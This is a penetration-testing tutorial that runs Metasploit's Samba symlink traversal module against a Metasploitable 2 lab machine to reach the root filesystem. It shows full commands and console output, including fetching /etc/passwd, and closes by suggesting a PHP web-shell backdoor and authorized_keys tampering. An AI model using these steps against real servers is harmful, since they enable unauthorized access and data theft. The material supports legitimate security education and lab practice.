How to Get Root Filesystem Access via Samba Symlink Traversal

Dec 11, 2019 10:35 PM
636955007653045503.jpg

Samba can be configured to allow any user with write access the ability to create a link to the root filesystem. Once an attacker has this level of access, it's only a matter of time before the system gets owned. Although this configuration isn't that common in the wild, it does happen, and Metasploit has a module to easily exploit this security flaw.

Symbolic links, or symlinks, are files that link to other files or directories on a system, and they are an essential part of the Linux environment. Symlinks are often used to connect libraries and redirect certain binaries to other versions.

File share systems, like Samba, can take advantage of symbolic links, allowing users to easily access linked folders and files. But these links are normally confined to within the share itself, making it impossible to access the underlying filesystem.

Samba does have an option to use wide links, which are basically symlinks that are allowed to link outside of the sandboxed file share. This is obviously a huge security hole, as any user with write access to a share can create a link to the root filesystem.

For this demonstration, we will be using Kali Linux to attack a Metasploitable 2 virtual machine. If you have a similar pentesting lab you can follow along.

Step 1: Create Link with Metasploit

The first thing we need to do after discovering that the SMB service is running on the target is to see if we can get access to the shares and, if so, find their names. We can use smbclient to do so:

~# smbclient -L //10.10.0.50/

Enter WORKGROUP\root's password:
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    tmp             Disk      oh noes!
    opt             Disk
    IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
    ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            METASPLOITABLE

Above, we can see that we are able to log in anonymously and list the shares. It looks like there are a couple of default shares, but the one that looks interesting is labeled tmp. It even has a comment that looks suspicious, so we'll use this as our target share.

Next, fire up Metasploit by typing msfconsole in the terminal.

~# msfconsole

[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

Once we're in and greeted by the login banner, we can search for a suitable module to use with the search command:

msf5 > search samba symlink

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                  normal     Yes    List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   auxiliary/server/wget_symlink_file_write             2014-10-27       normal     No     GNU Wget FTP Symlink Arbitrary Filesystem Access
   7   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   8   exploit/linux/local/abrt_raceabrt_priv_esc           2015-04-14       excellent  Yes    ABRT raceabrt Privilege Escalation
   9   exploit/linux/local/asan_suid_executable_priv_esc    2016-02-17       excellent  Yes    AddressSanitizer (ASan) SUID Executable Privilege Escalation
   10  exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   11  exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   12  exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   13  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   14  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   15  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   16  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   17  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   18  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   19  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   20  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   21  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   22  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   23  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   24  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   25  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   26  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   27  exploit/windows/local/ms13_097_ie_registry_symlink   2013-12-10       great      No     MS13-097 Registry Symlink IE Sandbox Escape
   28  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   29  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations

We received a lot of results from that search term, but the one we want to use is actually the first one. Load the module with the use command, followed by the path of the module:

msf5 > use auxiliary/admin/smb/samba_symlink_traversal

Now that we are loaded into the context of the module, we can use the options command to see the settings:

msf5 auxiliary(admin/smb/samba_symlink_traversal) > options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

It looks like it already has port 445 set as the correct port for SMB, as well as the name of the directory that will be created that links to the root filesystem. We need to set the RHOSTS option as the IP address of the target:

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

And the name of the share we want to write to, in this case, the tmp share:

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set smbshare tmp

smbshare => tmp

Now we should be all set, and all we have to do is type run at the prompt to launch the module:

msf5 auxiliary(admin/smb/samba_symlink_traversal) > run

[*] Running module against 10.10.0.50

[*] 10.10.0.50:445 - Connecting to the server...
[*] 10.10.0.50:445 - Trying to mount writeable share 'tmp'...
[*] 10.10.0.50:445 - Trying to link 'rootfs' to the root filesystem...
[*] 10.10.0.50:445 - Now access the following share to browse the root filesystem:
[*] 10.10.0.50:445 -    \\10.10.0.50\tmp\rootfs\

[*] Auxiliary module execution completed

It spits out what it is doing as it runs — we can see it first connects to the server and mounts the writable share we specified. Then, it creates a link to the root filesystem and tells us where to go to access it. Perfect.

Step 2: Access Root Filesystem

Once the module does its thing, we can exit Metasploit with the exit command and connect to the target SMB share with smbclient:

msf5 > exit
~# smbclient //10.10.0.50/tmp

Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

We can log in anonymously again and use the ls command to view the contents of the share:

smb: \> ls

  .                                   D        0  Wed Aug  8 10:52:28 2018
  ..                                 DR        0  Sun May 20 13:36:12 2012
  4600.jsvc_up                        R        0  Wed Aug  8 08:57:48 2018
  .ICE-unix                          DH        0  Wed Aug  8 08:56:05 2018
  .X11-unix                          DH        0  Wed Aug  8 08:56:51 2018
  .X0-lock                           HR       11  Wed Aug  8 08:56:51 2018
  rootfs                             DR        0  Sun May 20 13:36:12 2012

        7282168 blocks of size 1024. 5430648 blocks available

It looks like there's a new directory here, the one that was created with the Metasploit module. This is a link, and we can enter it just like a normal directory. Let's do that and see what's inside:

smb: \> cd rootfs\
smb: \rootfs\> ls

  .                                  DR        0  Sun May 20 13:36:12 2012
  ..                                 DR        0  Sun May 20 13:36:12 2012
  initrd                             DR        0  Tue Mar 16 17:57:40 2010
  media                              DR        0  Tue Mar 16 17:55:52 2010
  bin                                DR        0  Sun May 13 22:35:33 2012
  lost+found                         DR        0  Tue Mar 16 17:55:15 2010
  mnt                                DR        0  Wed Apr 28 15:16:56 2010
  sbin                               DR        0  Sun May 13 20:54:53 2012
  initrd.img                          R  7929183  Sun May 13 22:35:56 2012
  home                               DR        0  Fri Apr 16 01:16:02 2010
  lib                                DR        0  Sun May 13 22:35:22 2012
  usr                                DR        0  Tue Apr 27 23:06:37 2010
  proc                               DR        0  Wed Aug  8 08:55:30 2018
  root                               DR        0  Wed Aug  8 08:56:51 2018
  sys                                DR        0  Wed Aug  8 08:55:31 2018
  boot                               DR        0  Sun May 13 22:36:28 2012
  nohup.out                           R    20962  Wed Aug  8 08:56:51 2018
  etc                                DR        0  Wed Aug  8 08:56:23 2018
  dev                                DR        0  Wed Aug  8 08:56:06 2018
  vmlinuz                             R  1987288  Thu Apr 10 11:55:41 2008
  opt                                DR        0  Tue Mar 16 17:57:39 2010
  var                                DR        0  Wed Mar 17 09:08:23 2010
  cdrom                              DR        0  Tue Mar 16 17:55:51 2010
  tmp                                 D        0  Wed Aug  8 10:52:28 2018
  srv                                DR        0  Tue Mar 16 17:57:38 2010

        7282168 blocks of size 1024. 5430648 blocks available

And there we have it — root filesystem access. We can now do things like view /etc/passwd, though we can't do that directly. Simply change into the /etc/ directory and use the get command to download the file to our machine:

smb: \rootfs\> cd etc
smb: \rootfs\etc\> get passwd

getting file \rootfs\etc\passwd of size 1581 as passwd (128.7 KiloBytes/sec) (average 128.7 KiloBytes/sec)

Now we can see all the users present on the target, their home directories, and the available shells — all useful info for reconnaissance:

~# cat passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false

Further Attack Scenarios

Since we now have access to the root filesystem, there are several different paths an attacker can take. It all depends on the attacker's imagination and the configuration of the target.

There is one major caveat here: even though we have root access to the filesystem, we do not have root privileges. We only have the permissions associated with the anonymous login to the tmp share (usually normal user privileges). This limits what can be done, but depending on how the server is configured, there are a few things we could try.

For instance, since we have write access, we could place a PHP backdoor in the web root directory of Apache, and navigate to it in the browser to trigger a shell to our local machine. Another attack vector, if SSH config file permissions are lax, would be to add ourselves to the authorized keys file, allowing us to SSH into the box.

As a hacker, it is essential to be creative, and even in situations where escalating to shell access seems impossible, with enough patience and creativity, it can be done.

Wrapping Up

Today, we learned about wide links in Samba and how they can be abused to access the root filesystem. After verifying we could access an SMB share, we used a Metasploit module to create a link pointing to the root directory on the server. We could then view the root filesystem and explored a couple of possible attack vectors. The ability to leverage a simple misconfiguration to exploit the system should be the goal of any white-hat hacker.

Cover image by Pixabay/Pexels; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!